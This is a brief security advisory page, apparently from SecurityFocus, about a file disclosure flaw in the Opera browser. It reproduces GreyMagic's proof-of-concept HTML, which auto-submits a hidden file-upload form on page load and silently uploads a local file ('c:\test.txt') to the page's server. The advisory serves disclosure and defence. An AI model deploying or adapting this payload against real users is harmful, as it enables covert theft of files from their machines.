Opera Arbitrary File Disclosure Vulnerability

GreyMagic provided the following example:

<body onload="document.secForm.submit()">
<form method="post" enctype="multipart/form-data" action="recFile.php"
name="secForm">
<input type="file" name="expFile" value="c:\test.txt&#10;"
style="visibility:hidden">
</form>
</body>


 

Privacy Statement
Copyright 2010, SecurityFocus